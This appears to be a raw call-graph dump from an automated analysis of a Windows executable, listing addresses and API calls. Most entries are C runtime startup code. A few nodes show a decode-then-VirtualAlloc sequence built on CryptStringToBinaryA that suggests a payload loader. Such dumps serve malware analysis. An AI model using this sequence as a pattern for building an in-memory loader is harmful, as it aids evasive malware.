7ffc28919410 17180->17612 17184 7ffc28919268 17185 7ffc28901540 47 API calls 17184->17185 17186 7ffc28919275 17185->17186 17187 7ffc28919382 __scrt_fastfail 17186->17187 17188 7ffc28919282 17186->17188 17620 7ffc28919510 17187->17620 17628 7ffc28919f00 17188->17628 17191 7ffc2891929f MessageBoxA 17191->17173 17192 7ffc289192bb LoadStringW LoadStringW 17633 7ffc28913ed0 LoadCursorW RegisterClassExW 17192->17633 17196 7ffc28919510 48 API calls 17196->17173 17197 7ffc28919308 17634 7ffc28913cb0 CreateWindowExW 17197->17634 17200 7ffc2891932d GetMessageW 17202 7ffc28919372 CoUninitialize 17200->17202 17203 7ffc28919344 TranslateAcceleratorW 17200->17203 17201 7ffc28919320 CoUninitialize 17201->17173 17202->17173 17204 7ffc28919370 17203->17204 17205 7ffc2891935a TranslateMessage DispatchMessageW 17203->17205 17204->17200 17205->17204 17207 7ffc28903f3a __isa_available_init 17206->17207 17246 7ffc28906ac0 17207->17246 17210 7ffc28903f43 17210->17156 17333 7ffc28903f64 17214->17333 17216 7ffc28903e23 17216->17163 17338 7ffc2890411c 17217->17338 17219 7ffc28904175 17220 7ffc28904b40 InitializeSListHead 17219->17220 17353 7ffc2890a86c 17221->17353 17227 7ffc28904969 __scrt_fastfail 17226->17227 17228 7ffc28904985 RtlCaptureContext RtlLookupFunctionEntry 17227->17228 17229 7ffc289049ea __scrt_fastfail 17228->17229 17230 7ffc289049ae RtlVirtualUnwind 17228->17230 17231 7ffc28904a1c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17229->17231 17230->17229 17232 7ffc28904a6e 17231->17232 17232->17158 17235 7ffc28903edd __scrt_release_startup_lock 17233->17235 17234 7ffc28903ef1 17234->17155 17235->17234 17481 7ffc2890a334 17235->17481 17239 7ffc28903f0f 17238->17239 17240 7ffc289070b0 __vcrt_uninitialize_ptd 6 API calls 17239->17240 17241 7ffc28906b45 17240->17241 17241->17159 17244 7ffc28904101 __scrt_uninitialize_crt 17242->17244 17243 7ffc28904113 17243->17145 17244->17243 17245 7ffc28906b1c __vcrt_uninitialize 8 API calls 17244->17245 17245->17243 17247 7ffc28906ac9 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 17246->17247 17266 7ffc28907974 17247->17266 17250 7ffc28903f3f 17250->17210 17254 7ffc2890a844 17250->17254 17255 7ffc2890e02c 17254->17255 17256 7ffc28903f4c 17255->17256 17317 7ffc2890dfb0 17255->17317 17256->17210 17258 7ffc28906b1c 17256->17258 17259 7ffc28906b35 17258->17259 17260 7ffc28906b24 17258->17260 17259->17210 17261 7ffc289070b0 __vcrt_uninitialize_ptd 6 API calls 17260->17261 17262 7ffc28906b29 17261->17262 17263 7ffc289079bc __vcrt_uninitialize_locks DeleteCriticalSection 17262->17263 17264 7ffc28906b2e 17263->17264 17329 7ffc28907de4 17264->17329 17267 7ffc2890797c 17266->17267 17269 7ffc289079ad 17267->17269 17271 7ffc28906ad3 17267->17271 17283 7ffc28907d20 17267->17283 17270 7ffc289079bc __vcrt_uninitialize_locks DeleteCriticalSection 17269->17270 17270->17271 17271->17250 17272 7ffc28907070 17271->17272 17298 7ffc28907bbc 17272->17298 17274 7ffc28907080 17278 7ffc28906ae0 17274->17278 17303 7ffc28907cb8 17274->17303 17276 7ffc2890709d 17276->17278 17308 7ffc289070b0 17276->17308 17278->17250 17279 7ffc289079bc 17278->17279 17280 7ffc289079e7 17279->17280 17281 7ffc289079eb 17280->17281 17282 7ffc289079ca DeleteCriticalSection 17280->17282 17281->17250 17282->17280 17288 7ffc289079f4 17283->17288 17286 7ffc28907d77 InitializeCriticalSectionAndSpinCount 17287 7ffc28907d63 17286->17287 17287->17267 17292 7ffc28907a55 17288->17292 17293 7ffc28907a5a 17288->17293 17289 7ffc28907b22 17289->17293 17294 7ffc28907b31 GetProcAddress 17289->17294 17290 7ffc28907a8d LoadLibraryExW 17291 7ffc28907ab3 GetLastError 17290->17291 17290->17292 17291->17292 17296 7ffc28907abe LoadLibraryExW 17291->17296 17292->17289 17292->17290 17292->17293 17297 7ffc28907b00 FreeLibrary 17292->17297 17293->17286 17293->17287 17294->17293 17295 7ffc28907b49 17294->17295 17295->17293 17296->17292 17297->17292 17299 7ffc289079f4 try_get_function 5 API calls 17298->17299 17300 7ffc28907be8 17299->17300 17301 7ffc28907bff TlsAlloc 17300->17301 17302 7ffc28907bf0 17300->17302 17301->17302 17302->17274 17304 7ffc289079f4 try_get_function 5 API calls 17303->17304 17305 7ffc28907ceb 17304->17305 17306 7ffc28907d04 TlsSetValue 17305->17306 17307 7ffc28907cf3 17305->17307 17306->17307 17307->17276 17309 7ffc289070c4 17308->17309 17310 7ffc289070bf 17308->17310 17309->17278 17312 7ffc28907c10 17310->17312 17313 7ffc289079f4 try_get_function 5 API calls 17312->17313 17314 7ffc28907c3b 17313->17314 17315 7ffc28907c51 TlsFree 17314->17315 17316 7ffc28907c43 17314->17316 17315->17316 17316->17309 17328 7ffc2890bd28 EnterCriticalSection 17317->17328 17319 7ffc2890dfc0 17320 7ffc2891060c 53 API calls 17319->17320 17321 7ffc2890dfc9 17320->17321 17323 7ffc2890ddb8 55 API calls 17321->17323 17327 7ffc2890dfd7 17321->17327 17322 7ffc2890bd7c new LeaveCriticalSection 17324 7ffc2890dfe3 17322->17324 17325 7ffc2890dfd2 17323->17325 17324->17255 17326 7ffc2890dea8 GetStdHandle GetFileType 17325->17326 17326->17327 17327->17322 17330 7ffc28907e1c 17329->17330 17331 7ffc28907de8 17329->17331 17330->17259 17331->17330 17332 7ffc28907e02 FreeLibrary 17331->17332 17332->17331 17334 7ffc28904022 17333->17334 17337 7ffc28903f7c __scrt_initialize_onexit_tables __scrt_release_startup_lock 17333->17337 17335 7ffc28904944 __scrt_fastfail 7 API calls 17334->17335 17336 7ffc2890402c 17335->17336 17337->17216 17339 7ffc2890414b 17338->17339 17341 7ffc28904141 _onexit 17338->17341 17342 7ffc2890a6bc 17339->17342 17341->17219 17345 7ffc2890a2f8 17342->17345 17352 7ffc2890bd28 EnterCriticalSection 17345->17352 17359 7ffc2890b890 17353->17359 17356 7ffc28906b08 17468 7ffc28906f4c 17356->17468 17360 7ffc2890b8a1 FlsGetValue 17359->17360 17361 7ffc28903e61 17359->17361 17360->17361 17362 7ffc2890b8ae FlsSetValue 17360->17362 17361->17356 17366 7ffc2890b730 17362->17366 17367 7ffc2890b77a 17366->17367 17368 7ffc2890b772 17366->17368 17370 7ffc2890a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17367->17370 17369 7ffc2890a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17368->17369 17369->17367 17371 7ffc2890b787 17370->17371 17372 7ffc2890a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17371->17372 17373 7ffc2890b794 17372->17373 17374 7ffc2890a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17373->17374 17375 7ffc2890b7a1 17374->17375 17376 7ffc2890a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17375->17376 17377 7ffc2890b7ae 17376->17377 17378 7ffc2890a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17377->17378 17379 7ffc2890b7bb 17378->17379 17380 7ffc2890a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17379->17380 17381 7ffc2890b7c8 17380->17381 17382 7ffc2890a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17381->17382 17383 7ffc2890b7d5 17382->17383 17384 7ffc2890a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17383->17384 17385 7ffc2890b7e5 17384->17385 17386 7ffc2890a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17385->17386 17387 7ffc2890b7f5 17386->17387 17398 7ffc2890b5e0 17387->17398 17412 7ffc2890bd28 EnterCriticalSection 17398->17412 17469 7ffc28903e66 17468->17469 17470 7ffc28906f60 17468->17470 17469->17149 17471 7ffc28906f6a 17470->17471 17476 7ffc28907c64 17470->17476 17473 7ffc28907cb8 __vcrt_FlsSetValue 6 API calls 17471->17473 17474 7ffc28906f7a 17473->17474 17474->17469 17475 7ffc2890a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17474->17475 17475->17469 17477 7ffc289079f4 try_get_function 5 API calls 17476->17477 17478 7ffc28907c8f 17477->17478 17479 7ffc28907ca5 TlsGetValue 17478->17479 17480 7ffc28907c97 17478->17480 17479->17480 17480->17471 17488 7ffc2890bd28 EnterCriticalSection 17481->17488 17653 7ffc28901710 17489->17653 17496 7ffc28901540 47 API calls 17497 7ffc289199f7 17496->17497 17498 7ffc28902970 49 API calls 17497->17498 17499 7ffc28919a13 17498->17499 17500 7ffc28901580 49 API calls 17499->17500 17501 7ffc28919a2a 17500->17501 17502 7ffc28901540 47 API calls 17501->17502 17503 7ffc28919a37 17502->17503 17504 7ffc28902970 49 API calls 17503->17504 17505 7ffc28919a53 17504->17505 17506 7ffc28901580 49 API calls 17505->17506 17507 7ffc28919a6a 17506->17507 17508 7ffc28901540 47 API calls 17507->17508 17509 7ffc28919a77 17508->17509 17510 7ffc28902970 49 API calls 17509->17510 17511 7ffc28919a93 17510->17511 17512 7ffc28901580 49 API calls 17511->17512 17513 7ffc28919aaa 17512->17513 17514 7ffc28901540 47 API calls 17513->17514 17515 7ffc28919ab7 17514->17515 17516 7ffc28902970 49 API calls 17515->17516 17517 7ffc28919ad3 17516->17517 17518 7ffc28901580 49 API calls 17517->17518 17519 7ffc28919aea 17518->17519 17520 7ffc28901540 47 API calls 17519->17520 17521 7ffc28919af7 17520->17521 17522 7ffc28902970 49 API calls 17521->17522 17523 7ffc28919b13 17522->17523 17524 7ffc28901580 49 API calls 17523->17524 17525 7ffc28919b2a 17524->17525 17526 7ffc28901540 47 API calls 17525->17526 17527 7ffc28919b37 17526->17527 17528 7ffc28902970 49 API calls 17527->17528 17529 7ffc28919b53 17528->17529 17530 7ffc28901580 49 API calls 17529->17530 17531 7ffc28919b6a 17530->17531 17532 7ffc28901540 47 API calls 17531->17532 17533 7ffc28919b77 17532->17533 17534 7ffc28902970 49 API calls 17533->17534 17535 7ffc28919b93 17534->17535 17536 7ffc28901580 49 API calls 17535->17536 17537 7ffc28919baa 17536->17537 17538 7ffc28901540 47 API calls 17537->17538 17539 7ffc28919bb7 17538->17539 17540 7ffc28902970 49 API calls 17539->17540 17541 7ffc28919bd3 17540->17541 17542 7ffc28901580 49 API calls 17541->17542 17543 7ffc28919bea 17542->17543 17544 7ffc28901540 47 API calls 17543->17544 17545 7ffc28919bf7 17544->17545 17546 7ffc28902970 49 API calls 17545->17546 17547 7ffc28919c13 17546->17547 17548 7ffc28901580 49 API calls 17547->17548 17549 7ffc28919c2a 17548->17549 17550 7ffc28901540 47 API calls 17549->17550 17551 7ffc28919c37 17550->17551 17552 7ffc28902970 49 API calls 17551->17552 17553 7ffc28919c53 17552->17553 17554 7ffc28901580 49 API calls 17553->17554 17555 7ffc28919c6a 17554->17555 17556 7ffc28901540 47 API calls 17555->17556 17557 7ffc28919c77 17556->17557 17558 7ffc28902970 49 API calls 17557->17558 17559 7ffc28919c93 17558->17559 17560 7ffc28901580 49 API calls 17559->17560 17561 7ffc28919cb0 17560->17561 17562 7ffc28901540 47 API calls 17561->17562 17563 7ffc28919cbd 17562->17563 17564 7ffc28902970 49 API calls 17563->17564 17565 7ffc28919cd9 17564->17565 17566 7ffc28901580 49 API calls 17565->17566 17567 7ffc28919cf6 17566->17567 17568 7ffc28901540 47 API calls 17567->17568 17569 7ffc28919d03 17568->17569 17570 7ffc28902970 49 API calls 17569->17570 17571 7ffc28919d1f 17570->17571 17572 7ffc28901580 49 API calls 17571->17572 17573 7ffc28919d3c 17572->17573 17574 7ffc28901540 47 API calls 17573->17574 17575 7ffc28919d49 17574->17575 17576 7ffc28902970 49 API calls 17575->17576 17577 7ffc28919d65 17576->17577 17578 7ffc28901580 49 API calls 17577->17578 17579 7ffc28919d82 17578->17579 17580 7ffc28901540 47 API calls 17579->17580 17581 7ffc28919d8f 17580->17581 17582 7ffc28902970 49 API calls 17581->17582 17583 7ffc28919dab 17582->17583 17584 7ffc28901580 49 API calls 17583->17584 17585 7ffc28919dc8 17584->17585 17586 7ffc28901540 47 API calls 17585->17586 17587 7ffc28919dd5 17586->17587 17588 7ffc28902970 49 API calls 17587->17588 17589 7ffc28919df1 17588->17589 17590 7ffc28901580 49 API calls 17589->17590 17591 7ffc28919e0e 17590->17591 17592 7ffc28901540 47 API calls 17591->17592 17593 7ffc28919e1b 17592->17593 17594 7ffc28902970 49 API calls 17593->17594 17595 7ffc28919e37 17594->17595 17596 7ffc28901580 49 API calls 17595->17596 17597 7ffc28919e54 17596->17597 17598 7ffc28901540 47 API calls 17597->17598 17599 7ffc28919e61 17598->17599 17600 7ffc28902970 49 API calls 17599->17600 17601 7ffc28919e7d 17600->17601 17602 7ffc28901580 49 API calls 17601->17602 17603 7ffc28919e9a 17602->17603 17604 7ffc28901540 47 API calls 17603->17604 17605 7ffc28919ea7 17604->17605 17683 7ffc289016a0 17605->17683 17608 7ffc28901540 47 API calls 17609 7ffc28919ed4 17608->17609 17610 7ffc28903a70 _UnwindNestedFrames 8 API calls 17609->17610 17611 7ffc28919eec 17610->17611 17611->17178 17613 7ffc28919437 CryptStringToBinaryA 17612->17613 17614 7ffc28919239 17612->17614 17613->17614 17615 7ffc28919476 new 17613->17615 17617 7ffc28901540 17614->17617 17615->17614 17616 7ffc289194b9 CryptStringToBinaryA 17615->17616 17616->17614 17618 7ffc28901910 type_info::_name_internal_method 47 API calls 17617->17618 17619 7ffc28901561 Concurrency::details::WorkQueue::IsStructuredEmpty 17618->17619 17619->17184 17927 7ffc289091b8 17620->17927 17623 7ffc289091b8 47 API calls 17624 7ffc2891954e 17623->17624 17625 7ffc289091b8 47 API calls 17624->17625 17626 7ffc2891955e VirtualAlloc 17625->17626 17627 7ffc289193bd 17626->17627 17627->17196 17956 7ffc28919f40 17628->17956 17630 7ffc28919f11 17631 7ffc2891928c CoInitialize 17630->17631 17632 7ffc28919f24 ExitProcess 17630->17632 17631->17191 17631->17192 17633->17197 17635 7ffc28913d53 RegisterTouchWindow 17634->17635 17642 7ffc28913d4c 17634->17642 17636 7ffc28913d64 MessageBoxW 17635->17636 17637 7ffc28913d87 17635->17637 17636->17642 17638 7ffc28913d93 CoCreateInstance 17637->17638 17639 7ffc28913dc6 17638->17639 17638->17642 17980 7ffc28903d6c 17639->17980 17641 7ffc28913dd0 17641->17642 17643 7ffc28913e9b ShowWindow UpdateWindow 17641->17643 17642->17200 17642->17201 17643->17642 17645 7ffc28903a7a 17644->17645 17646 7ffc28903a86 17645->17646 17647 7ffc28903b04 IsProcessorFeaturePresent 17645->17647 17646->17132 17646->17133 17648 7ffc28903b1b 17647->17648 17994 7ffc28903cf8 RtlCaptureContext 17648->17994 17654 7ffc28901731 17653->17654 17689 7ffc28901910 17654->17689 17656 7ffc28901741 17693 7ffc28901b10 17656->17693 17659 7ffc28902970 17855 7ffc28901760 17659->17855 17661 7ffc289029ad char_traits 17859 7ffc28902cc0 17661->17859 17663 7ffc289029e2 17863 7ffc28902e90 17663->17863 17668 7ffc289016a0 47 API calls 17669 7ffc28902a12 17668->17669 17670 7ffc28901540 47 API calls 17669->17670 17671 7ffc28902a27 17670->17671 17672 7ffc28903a70 _UnwindNestedFrames 8 API calls 17671->17672 17673 7ffc28902a39 17672->17673 17674 7ffc28901580 17673->17674 17675 7ffc289015a7 17674->17675 17681 7ffc28901677 17674->17681 17676 7ffc28901910 type_info::_name_internal_method 47 API calls 17675->17676 17677 7ffc289015b6 Concurrency::details::WorkQueue::IsStructuredEmpty Concurrency::details::HardwareAffinity::operator!= 17676->17677 17678 7ffc2890167a 17677->17678 17679 7ffc2890163d 17677->17679 17896 7ffc28901f00 17678->17896 17892 7ffc28902a90 17679->17892 17681->17496 17684 7ffc289016c1 Concurrency::details::WorkQueue::IsStructuredEmpty shared_ptr 17683->17684 17685 7ffc28901910 type_info::_name_internal_method 47 API calls 17684->17685 17686 7ffc289016e8 17685->17686 17687 7ffc28901f00 47 API calls 17686->17687 17688 7ffc28901701 17687->17688 17688->17608 17690 7ffc2890192b type_info::_name_internal_method 17689->17690 17691 7ffc28901930 Concurrency::details::WorkQueue::IsStructuredEmpty Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17689->17691 17690->17656 17691->17690 17697 7ffc28902100 17691->17697 17694 7ffc28901b28 char_traits 17693->17694 17765 7ffc28901b40 17694->17765 17696 7ffc28901750 17696->17659 17700 7ffc28902880 17697->17700 17703 7ffc289013a0 17700->17703 17702 7ffc28902127 17702->17690 17704 7ffc289013c8 17703->17704 17707 7ffc289013cd 17703->17707 17715 7ffc28909764 17704->17715 17706 7ffc2890146b 17706->17702 17707->17706 17708 7ffc28901409 17707->17708 17710 7ffc28909764 _invalid_parameter_noinfo_noreturn 47 API calls 17707->17710 17709 7ffc28901435 17708->17709 17711 7ffc28909764 _invalid_parameter_noinfo_noreturn 47 API calls 17708->17711 17712 7ffc28901450 17709->17712 17713 7ffc28909764 _invalid_parameter_noinfo_noreturn 47 API calls 17709->17713 17710->17708 17711->17709 17712->17706 17714 7ffc28909764 _invalid_parameter_noinfo_noreturn 47 API calls 17712->17714 17713->17712 17714->17706 17720 7ffc289095d8 17715->17720 17721 7ffc28909603 17720->17721 17732 7ffc28909674 17721->17732 17723 7ffc2890962a 17724 7ffc2890964d 17723->17724 17742 7ffc289090d0 17723->17742 17726 7ffc28909662 17724->17726 17727 7ffc289090d0 _invalid_parameter_noinfo_noreturn 47 API calls 17724->17727 17728 7ffc28909794 IsProcessorFeaturePresent 17726->17728 17727->17726 17729 7ffc289097a7 17728->17729 17757 7ffc28909474 17729->17757 17733 7ffc289093bc _invalid_parameter_noinfo_noreturn 18 API calls 17732->17733 17734 7ffc2890969e 17733->17734 17735 7ffc289096af 17734->17735 17736 7ffc28909428 _invalid_parameter_noinfo_noreturn GetLastError SetLastError 17734->17736 17735->17723 17737 7ffc289096fb 17736->17737 17737->17735 17738 7ffc28909794 _invalid_parameter_noinfo_noreturn 17 API calls 17737->17738 17739 7ffc28909742 17738->17739 17740 7ffc289095d8 _invalid_parameter_noinfo_noreturn 47 API calls 17739->17740 17741 7ffc2890975d 17740->17741 17741->17723 17743 7ffc289090df GetLastError 17742->17743 17744 7ffc28909128 17742->17744 17745 7ffc289090f4 17743->17745 17744->17724 17746 7ffc2890bb14 _invalid_parameter_noinfo_noreturn 16 API calls 17745->17746 17747 7ffc2890910e SetLastError 17746->17747 17747->17744 17748 7ffc28909131 17747->17748 17749 7ffc2890aa78 __InternalCxxFrameHandler 45 API calls 17748->17749 17750 7ffc28909136 17749->17750 17751 7ffc289090d0 _invalid_parameter_noinfo_noreturn 45 API calls 17750->17751 17752 7ffc28909157 17751->17752 17753 7ffc2890b474 _invalid_parameter_noinfo_noreturn 45 API calls 17752->17753 17754 7ffc2890917f 17753->17754 17755 7ffc2890b4e0 _invalid_parameter_noinfo_noreturn 45 API calls 17754->17755 17756 7ffc2890918f 17755->17756 17756->17724 17758 7ffc289094ae __scrt_fastfail _invalid_parameter_noinfo_noreturn 17757->17758 17759 7ffc289094d6 RtlCaptureContext RtlLookupFunctionEntry 17758->17759 17760 7ffc28909510 RtlVirtualUnwind 17759->17760 17761 7ffc28909546 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17759->17761 17760->17761 17763 7ffc28909598 _invalid_parameter_noinfo_noreturn 17761->17763 17762 7ffc28903a70 _UnwindNestedFrames 8 API calls 17764 7ffc289095b7 GetCurrentProcess TerminateProcess 17762->17764 17763->17762 17766 7ffc28901b62 type_info::_name_internal_method 17765->17766 17767 7ffc28901b69 Concurrency::details::ContextBase::GetWorkQueueIdentity 17766->17767 17768 7ffc28901b97 17766->17768 17781 7ffc28901bf0 17767->17781 17772 7ffc289022b0 17768->17772 17771 7ffc28901b95 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17771->17696 17773 7ffc289022cd type_info::_name_internal_method 17772->17773 17774 7ffc289022de type_info::_name_internal_method 17773->17774 17797 7ffc28902230 17773->17797 17776 7ffc289022f2 type_info::_name_internal_method 17774->17776 17779 7ffc28902310 type_info::_name_internal_method 17774->17779 17791 7ffc28902600 17776->17791 17778 7ffc2890230e type_info::_name_internal_method 17778->17771 17779->17778 17780 7ffc28901910 type_info::_name_internal_method 47 API calls 17779->17780 17780->17778 17834 7ffc289021f0 17781->17834 17783 7ffc28901c17 type_info::_name_internal_method 17784 7ffc28901c6c 17783->17784 17785 7ffc28901c3c 17783->17785 17786 7ffc289022b0 type_info::_name_internal_method 49 API calls 17784->17786 17838 7ffc28902520 17785->17838 17790 7ffc28901c6a Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17786->17790 17788 7ffc28901c59 17841 7ffc28902450 17788->17841 17790->17771 17792 7ffc28902640 Concurrency::details::WorkQueue::IsStructuredEmpty type_info::_name_internal_method 17791->17792 17800 7ffc289028e0 17792->17800 17794 7ffc28901910 type_info::_name_internal_method 47 API calls 17796 7ffc289027c2 Concurrency::details::WorkQueue::IsStructuredEmpty construct type_info::_name_internal_method 17794->17796 17795 7ffc28902760 Concurrency::details::ContextBase::GetWorkQueueIdentity char_traits 17795->17794 17796->17778 17817 7ffc28904e9c 17797->17817 17803 7ffc28902930 17800->17803 17806 7ffc289012b0 17803->17806 17807 7ffc289012de 17806->17807 17816 7ffc289012d4 17806->17816 17808 7ffc289012f8 17807->17808 17809 7ffc28904e7c Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 17807->17809 17810 7ffc2890137c 17808->17810 17812 7ffc2890131c 17808->17812 17809->17808 17811 7ffc28903d6c new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 17810->17811 17811->17816 17813 7ffc2890133b 17812->17813 17814 7ffc28904e7c Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 17812->17814 17815 7ffc28903d6c new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 17813->17815 17814->17813 17815->17816 17816->17795 17822 7ffc28904c70 17817->17822 17821 7ffc28904ebe 17830 7ffc28906d48 17822->17830 17824 7ffc28904ca7 17825 7ffc28906e00 17824->17825 17826 7ffc28906e6e RtlPcToFileHeader 17825->17826 17829 7ffc28906e4c 17825->17829 17827 7ffc28906e93 17826->17827 17828 7ffc28906eae RaiseException 17826->17828 17827->17828 17828->17821 17829->17826 17831 7ffc28906d9e __std_exception_destroy 17830->17831 17832 7ffc28906d69 new 17830->17832 17831->17824 17832->17831 17833 7ffc2890a97c __std_exception_copy 47 API calls 17832->17833 17833->17831 17835 7ffc28902208 type_info::_name_internal_method 17834->17835 17836 7ffc2890221c 17835->17836 17844 7ffc289025e0 17835->17844 17836->17783 17839 7ffc289021f0 type_info::_name_internal_method 49 API calls 17838->17839 17840 7ffc2890253d type_info::_name_internal_method 17839->17840 17840->17788 17842 7ffc289021f0 type_info::_name_internal_method 49 API calls 17841->17842 17843 7ffc28902472 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17842->17843 17843->17790 17847 7ffc28904ec0 17844->17847 17852 7ffc28904d3c 17847->17852 17850 7ffc28906e00 _CxxThrowException 2 API calls 17851 7ffc28904ee2 17850->17851 17853 7ffc28906d48 __std_exception_copy 47 API calls 17852->17853 17854 7ffc28904d73 17853->17854 17854->17850 17856 7ffc2890177c 17855->17856 17857 7ffc28901910 type_info::_name_internal_method 47 API calls 17856->17857 17858 7ffc2890178c 17857->17858 17858->17661 17861 7ffc28902cd8 type_info::_name_internal_method 17859->17861 17860 7ffc28902d1a type_info::_name_internal_method 17860->17663 17861->17860 17862 7ffc289022b0 type_info::_name_internal_method 49 API calls 17861->17862 17862->17860 17869 7ffc28901510 17863->17869 17866 7ffc28902e60 17879 7ffc289014e0 17866->17879 17872 7ffc28901df0 17869->17872 17871 7ffc28901537 17871->17866 17873 7ffc289021f0 type_info::_name_internal_method 49 API calls 17872->17873 17874 7ffc28901e17 type_info::_name_internal_method 17873->17874 17875 7ffc28902230 _Mtx_guard::~_Mtx_guard 49 API calls 17874->17875 17876 7ffc28901e5b type_info::_name_internal_method 17874->17876 17875->17876 17877 7ffc289022b0 type_info::_name_internal_method 49 API calls 17876->17877 17878 7ffc28901e8c Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17876->17878 17877->17878 17878->17871 17880 7ffc289014f8 char_traits 17879->17880 17883 7ffc28901ce0 17880->17883 17882 7ffc2890150a 17882->17668 17884 7ffc28901d02 type_info::_name_internal_method 17883->17884 17885 7ffc28901d09 Concurrency::details::ContextBase::GetWorkQueueIdentity 17884->17885 17887 7ffc28901d3a type_info::_name_internal_method 17884->17887 17886 7ffc28901df0 type_info::_name_internal_method 49 API calls 17885->17886 17891 7ffc28901d35 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17886->17891 17888 7ffc28902230 _Mtx_guard::~_Mtx_guard 49 API calls 17887->17888 17889 7ffc28901d65 type_info::_name_internal_method 17887->17889 17888->17889 17890 7ffc289022b0 type_info::_name_internal_method 49 API calls 17889->17890 17889->17891 17890->17891 17891->17882 17893 7ffc28902ab2 17892->17893 17900 7ffc28902d40 17893->17900 17897 7ffc28901f18 Concurrency::details::WorkQueue::IsStructuredEmpty construct type_info::_name_internal_method char_traits 17896->17897 17898 7ffc28901910 type_info::_name_internal_method 47 API calls 17897->17898 17899 7ffc28902016 17898->17899 17899->17681 17901 7ffc28902d6d 17900->17901 17902 7ffc28902d74 type_info::_name_internal_method 17901->17902 17903 7ffc28902dc1 type_info::_name_internal_method 17901->17903 17904 7ffc28902450 49 API calls 17902->17904 17907 7ffc28902fc0 17903->17907 17905 7ffc28902af4 17904->17905 17905->17681 17908 7ffc28902fea type_info::_name_internal_method 17907->17908 17909 7ffc28902ff1 Concurrency::details::ContextBase::GetWorkQueueIdentity 17908->17909 17910 7ffc2890303c 17908->17910 17918 7ffc28903240 17909->17918 17911 7ffc289021f0 type_info::_name_internal_method 49 API calls 17910->17911 17913 7ffc2890304b type_info::_name_internal_method 17911->17913 17914 7ffc28902230 _Mtx_guard::~_Mtx_guard 49 API calls 17913->17914 17915 7ffc289030aa Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17913->17915 17914->17915 17916 7ffc289022b0 type_info::_name_internal_method 49 API calls 17915->17916 17917 7ffc28903037 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17915->17917 17916->17917 17917->17905 17919 7ffc289021f0 type_info::_name_internal_method 49 API calls 17918->17919 17920 7ffc28903270 17919->17920 17921 7ffc289021f0 type_info::_name_internal_method 49 API calls 17920->17921 17922 7ffc28903285 type_info::_name_internal_method 17921->17922 17923 7ffc28902230 _Mtx_guard::~_Mtx_guard 49 API calls 17922->17923 17924 7ffc28903315 type_info::_name_internal_method 17922->17924 17923->17924 17925 7ffc289022b0 type_info::_name_internal_method 49 API calls 17924->17925 17926 7ffc2890338e Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17924->17926 17925->17926 17926->17917 17928 7ffc289091e8 17927->17928 17935 7ffc2890893c 17928->17935 17931 7ffc2890923c 17933 7ffc28909251 17931->17933 17934 7ffc289090d0 _invalid_parameter_noinfo_noreturn 47 API calls 17931->17934 17932 7ffc289090d0 _invalid_parameter_noinfo_noreturn 47 API calls 17932->17931 17933->17623 17934->17933 17936 7ffc28908947 17935->17936 17937 7ffc28908975 17936->17937 17938 7ffc28908987 17936->17938 17939 7ffc2890b420 _set_errno_from_matherr 11 API calls 17937->17939 17941 7ffc28908995 17938->17941 17944 7ffc289089d1 17938->17944 17940 7ffc2890897a 17939->17940 17953 7ffc28909744 17940->17953 17943 7ffc28909674 _invalid_parameter_noinfo_noreturn 47 API calls 17941->17943 17948 7ffc28908985 17941->17948 17943->17948 17945 7ffc28908d5d 17944->17945 17947 7ffc2890b420 _set_errno_from_matherr 11 API calls 17944->17947 17946 7ffc2890b420 _set_errno_from_matherr 11 API calls 17945->17946 17945->17948 17949 7ffc28908ffd 17946->17949 17950 7ffc28908d52 17947->17950 17948->17931 17948->17932 17952 7ffc28909744 _invalid_parameter_noinfo 47 API calls 17949->17952 17951 7ffc28909744 _invalid_parameter_noinfo 47 API calls 17950->17951 17951->17945 17952->17948 17954 7ffc289095d8 _invalid_parameter_noinfo_noreturn 47 API calls 17953->17954 17955 7ffc2890975d 17954->17955 17955->17948 17959 7ffc2891a250 17956->17959 17958 7ffc28919f51 17958->17630 17962 7ffc2891acc0 17959->17962 17961 7ffc2891a261 17961->17958 17965 7ffc2891b560 17962->17965 17964 7ffc2891acd1 17964->17961 17968 7ffc2891bc70 17965->17968 17967 7ffc2891b571 17967->17964 17971 7ffc2891c580 17968->17971 17970 7ffc2891bc81 17970->17967 17974 7ffc2891cf10 17971->17974 17973 7ffc2891c591 17973->17970 17977 7ffc2891d890 17974->17977 17976 7ffc2891cf21 17976->17973 17978 7ffc2891e020 8 API calls 17977->17978 17979 7ffc2891d8a1 17978->17979 17979->17976 17983 7ffc28903d77 new 17980->17983 17981 7ffc28903da2 17981->17641 17982 7ffc289097ec new 2 API calls 17982->17983 17983->17981 17983->17982 17986 7ffc2890472c 17983->17986 17990 7ffc2890470c 17983->17990 17987 7ffc2890473a std::bad_alloc::bad_alloc 17986->17987 17988 7ffc28906e00 _CxxThrowException 2 API calls 17987->17988 17989 7ffc2890474b 17988->17989 